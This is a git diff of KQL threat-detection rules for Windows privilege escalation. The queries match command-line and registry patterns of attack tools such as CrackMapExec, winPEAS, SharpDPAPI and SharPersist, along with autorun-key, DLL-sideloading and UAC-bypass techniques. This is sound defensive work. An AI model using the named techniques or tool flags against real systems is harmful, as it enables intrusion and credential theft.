+// Author: Dimitrios Slamaris
+// Date: 2017-05-15
+// Level: high
+// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql
index 88473e7c..2b5db063 100644
--- a/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql
+++ b/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql
@@ -1,14 +1,14 @@
-// Title: Direct Autorun Keys Modification
-// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2019-10-25
-// Level: medium
-// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
-// - Legitimate administrator sets up autorun keys for legitimate reasons.
-// - Discord
-
-DeviceProcessEvents
+// Title: Direct Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
+// - Legitimate administrator sets up autorun keys for legitimate reasons.
+// - Discord
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "add" and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql b/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql
index 0e1002a7..1aafa254 100644
--- a/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql
+++ b/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql
@@ -1,10 +1,10 @@
-// Title: DLL Execution Via Register-cimprovider.exe
-// Author: Ivan Dyachkov, Yulia Fomina, oscd.community
-// Date: 2020-10-07
-// Level: medium
-// Description: Detects using register-cimprovider.exe to execute arbitrary dll file.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574
-
-DeviceProcessEvents
+// Title: DLL Execution Via Register-cimprovider.exe
+// Author: Ivan Dyachkov, Yulia Fomina, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects using register-cimprovider.exe to execute arbitrary dll file.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql b/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql
index d26ddbe1..01fa09f5 100644
--- a/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql
+++ b/KQL/rules/Privilege Escalation/dll_load_via_lsass.kql
@@ -1,10 +1,10 @@
-// Title: DLL Load via LSASS
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-10-16
-// Level: high
-// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.008
-
-DeviceRegistryEvents
+// Title: DLL Load via LSASS
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-16
+// Level: high
+// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.008
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql b/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql
index a5b34511..e57b28c5 100644
--- a/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql
+++ b/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql
@@ -1,12 +1,12 @@
-// Title: DLL Sideloading by VMware Xfer Utility
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-02
-// Level: high
-// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: DLL Sideloading by VMware Xfer Utility
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-02
+// Level: high
+// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql b/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql
index 4b644c9b..7d169368 100644
--- a/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql
+++ b/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql
@@ -1,12 +1,12 @@
-// Title: Dllhost.EXE Execution Anomaly
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-27
-// Level: high
-// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Dllhost.EXE Execution Anomaly
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-27
+// Level: high
+// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine)))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql b/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql
index 9e503e72..984523a4 100644
--- a/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql
+++ b/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql
@@ -1,13 +1,13 @@
-// Title: Explorer NOUACCHECK Flag
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-23
-// Level: high
-// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
-// False Positives:
-// - Domain Controller User Logon
-// - Unknown how many legitimate software products use that method
-
-DeviceProcessEvents
+// Title: Explorer NOUACCHECK Flag
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: high
+// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+// False Positives:
+// - Domain Controller User Logon
+// - Unknown how many legitimate software products use that method
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql b/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql
index 2740394f..0a56d66a 100644
--- a/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql
+++ b/KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql
@@ -1,12 +1,12 @@
-// Title: Fax Service DLL Search Order Hijack
-// Author: NVISO
-// Date: 2020-05-04
-// Level: high
-// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Fax Service DLL Search Order Hijack
+// Author: NVISO
+// Date: 2020-05-04
+// Level: high
+// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\"))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql b/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql
index 1f45d537..676a4a8b 100644
--- a/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql
+++ b/KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql
@@ -1,10 +1,10 @@
-// Title: File Creation In Suspicious Directory By Msdt.EXE
-// Author: Vadim Varganov, Florian Roth (Nextron Systems)
-// Date: 2022-08-24
-// Level: high
-// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, cve.2022-30190
-
-DeviceFileEvents
+// Title: File Creation In Suspicious Directory By Msdt.EXE
+// Author: Vadim Varganov, Florian Roth (Nextron Systems)
+// Date: 2022-08-24
+// Level: high
+// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001, cve.2022-30190
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql b/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql
index e5cb3b0a..20f6e7b1 100644
--- a/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql
+++ b/KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql
@@ -1,10 +1,10 @@
-// Title: Guest Account Enabled Via Sysadminctl
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-02-18
-// Level: low
-// Description: Detects attempts to enable the guest account using the sysadminctl utility
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078, attack.t1078.001
-
-DeviceProcessEvents
+// Title: Guest Account Enabled Via Sysadminctl
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-02-18
+// Level: low
+// Description: Detects attempts to enable the guest account using the sysadminctl utility
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078, attack.t1078.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -guestAccount" and ProcessCommandLine contains " on") and FolderPath endswith "/sysadminctl"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql b/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql
index deb09d0a..bceef24b 100644
--- a/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql
+++ b/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - CrackMapExec Execution Patterns
-// Author: Thomas Patzke
-// Date: 2020-05-22
-// Level: high
-// Description: Detects various execution patterns of the CrackMapExec pentesting framework
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106
-
-DeviceProcessEvents
+// Title: HackTool - CrackMapExec Execution Patterns
+// Author: Thomas Patzke
+// Date: 2020-05-22
+// Level: high
+// Description: Detects various execution patterns of the CrackMapExec pentesting framework
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.s0106
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "cmd.exe /Q /c " and ProcessCommandLine contains " 1> \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > \\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains " 2>&1") or (ProcessCommandLine contains "cmd.exe /C " and ProcessCommandLine contains " > " and ProcessCommandLine contains "\\Temp\\" and ProcessCommandLine contains " 2>&1") or ProcessCommandLine contains "powershell.exe -exec bypass -noni -nop -w 1 -C \"" or ProcessCommandLine contains "powershell.exe -noni -nop -w 1 -enc "
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql b/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql
index ebb9ab75..c43dbd26 100644
--- a/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql
+++ b/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql
@@ -1,12 +1,12 @@
-// Title: HackTool - DInjector PowerShell Cradle Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-12-07
-// Level: critical
-// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: HackTool - DInjector PowerShell Cradle Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-07
+// Level: critical
+// Description: Detects the use of the Dinject PowerShell cradle based on the specific flags
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " /am51" and ProcessCommandLine contains " /password"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql
index 8dd598e6..0e972750 100644
--- a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql
+++ b/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql
@@ -1,11 +1,11 @@
-// Title: HackTool - HollowReaper Execution
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-07-01
-// Level: high
-// Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing.
-// It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012
-
-DeviceProcessEvents
+// Title: HackTool - HollowReaper Execution
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-01
+// Level: high
+// Description: Detects usage of HollowReaper, a process hollowing shellcode launcher used for stealth payload execution through process hollowing.
+// It replaces the memory of a legitimate process with custom shellcode, allowing the attacker to execute payloads under the guise of trusted binaries.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012
+
+DeviceProcessEvents
 | where FolderPath endswith "\\HollowReaper.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql b/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql
index 492ddb5b..d9676e34 100644
--- a/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql
+++ b/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql
@@ -1,10 +1,10 @@
-// Title: HackTool - Impersonate Execution
-// Author: Sai Prashanth Pulisetti @pulisettis
-// Date: 2022-12-21
-// Level: medium
-// Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
-
-DeviceProcessEvents
+// Title: HackTool - Impersonate Execution
+// Author: Sai Prashanth Pulisetti @pulisettis
+// Date: 2022-12-21
+// Level: medium
+// Description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "impersonate.exe" and (ProcessCommandLine contains " list " or ProcessCommandLine contains " exec " or ProcessCommandLine contains " adduser ")) or (MD5 startswith "9520714AB576B0ED01D1513691377D01" or SHA256 startswith "E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql
index af05ec45..58362b4a 100644
--- a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql
+++ b/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql
@@ -1,11 +1,11 @@ -// Title: HackTool - SharpDPAPI Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2024-06-26 -// Level: high -// Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. -// SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 - -DeviceProcessEvents +// Title: HackTool - SharpDPAPI Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-06-26 +// Level: high +// Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. +// SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 + +DeviceProcessEvents | where (FolderPath endswith "\\SharpDPAPI.exe" or ProcessVersionInfoOriginalFileName =~ "SharpDPAPI.exe") or ((ProcessCommandLine contains " backupkey " or ProcessCommandLine contains " blob " or ProcessCommandLine contains " certificates " or ProcessCommandLine contains " credentials " or ProcessCommandLine contains " keepass " or ProcessCommandLine contains " masterkeys " or ProcessCommandLine contains " rdg " or ProcessCommandLine contains " vaults ") and ((ProcessCommandLine contains " /file:" or ProcessCommandLine contains " /machine" or ProcessCommandLine contains " /mkfile:" or ProcessCommandLine contains " /password:" or ProcessCommandLine contains " /pvk:" or ProcessCommandLine contains " /server:" or ProcessCommandLine contains " /target:" or ProcessCommandLine contains " /unprotect") or (ProcessCommandLine contains " {" and ProcessCommandLine contains "}:"))) \ No newline at end of file 
diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql index b8e07a5b..a67a7260 100644 --- a/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharPersist Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2022-09-15 -// Level: high -// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053 - -DeviceProcessEvents +// Title: HackTool - SharPersist Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2022-09-15 +// Level: high +// Description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053 + +DeviceProcessEvents | where (ProcessCommandLine contains " -t schtask -c " or ProcessCommandLine contains " -t startupfolder -c ") or (ProcessCommandLine contains " -t reg -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t service -c " and ProcessCommandLine contains " -m add") or (ProcessCommandLine contains " -t schtask -c " and ProcessCommandLine contains " -m add") or (FolderPath endswith "\\SharPersist.exe" or ProcessVersionInfoProductName =~ "SharPersist") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql b/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql index f027e1ea..3446ac0f 100644 --- a/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql 
+++ b/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql @@ -1,10 +1,10 @@ -// Title: HackTool - SharpImpersonation Execution -// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-27 -// Level: high -// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 - -DeviceProcessEvents +// Title: HackTool - SharpImpersonation Execution +// Author: Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-27 +// Level: high +// Description: Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1134.001, attack.t1134.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains " user:" and ProcessCommandLine contains " binary:") or (ProcessCommandLine contains " user:" and ProcessCommandLine contains " shellcode:") or (ProcessCommandLine contains " technique:CreateProcessAsUserW" or ProcessCommandLine contains " technique:ImpersonateLoggedOnuser")) or (FolderPath endswith "\\SharpImpersonation.exe" or ProcessVersionInfoOriginalFileName =~ "SharpImpersonation.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql b/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql index 76348962..1475f038 100644 --- a/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql +++ b/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql 
@@ -1,12 +1,12 @@ -// Title: HackTool - winPEAS Execution -// Author: Georg Lauenstein (sure[secure]) -// Date: 2022-09-19 -// Level: high -// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.discovery, attack.t1082, attack.t1087, attack.t1046 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: HackTool - winPEAS Execution +// Author: Georg Lauenstein (sure[secure]) +// Date: 2022-09-19 +// Level: high +// Description: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.discovery, attack.t1082, attack.t1087, attack.t1046 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "https://github.com/carlospolop/PEASS-ng/releases/latest/download/" or (ProcessCommandLine contains " applicationsinfo" or ProcessCommandLine contains " browserinfo" or ProcessCommandLine contains " eventsinfo" or ProcessCommandLine contains " fileanalysis" or ProcessCommandLine contains " filesinfo" or ProcessCommandLine contains " processinfo" or ProcessCommandLine contains " servicesinfo" or ProcessCommandLine contains " windowscreds") or (InitiatingProcessCommandLine endswith " -linpeas" or ProcessCommandLine endswith " -linpeas") or (ProcessVersionInfoOriginalFileName =~ "winPEAS.exe" or (FolderPath endswith "\\winPEASany_ofs.exe" or FolderPath endswith "\\winPEASany.exe" or FolderPath endswith "\\winPEASx64_ofs.exe" or FolderPath endswith "\\winPEASx64.exe" or FolderPath endswith "\\winPEASx86_ofs.exe" or FolderPath endswith "\\winPEASx86.exe")) \ No newline at end of file 
diff --git a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql index ae3193f5..0f9efe77 100644 --- a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql +++ b/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql 
@@ -1,11 +1,11 @@ -// Title: HKTL - SharpSuccessor Privilege Escalation Tool Execution -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-06-06 -// Level: high -// Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments. -// Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.t1068 - -DeviceProcessEvents +// Title: HKTL - SharpSuccessor Privilege Escalation Tool Execution +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-06 +// Level: high +// Description: Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments. +// Successful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068 + +DeviceProcessEvents | where FolderPath endswith "\\SharpSuccessor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpSuccessor.exe" or ProcessCommandLine contains "SharpSuccessor" or (ProcessCommandLine contains " add " and ProcessCommandLine contains " /impersonate" and ProcessCommandLine contains " /path" and ProcessCommandLine contains " /account" and ProcessCommandLine contains " /name") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql b/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql index 4b4f7048..9a64e30d 100644 --- a/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql +++ b/KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql 
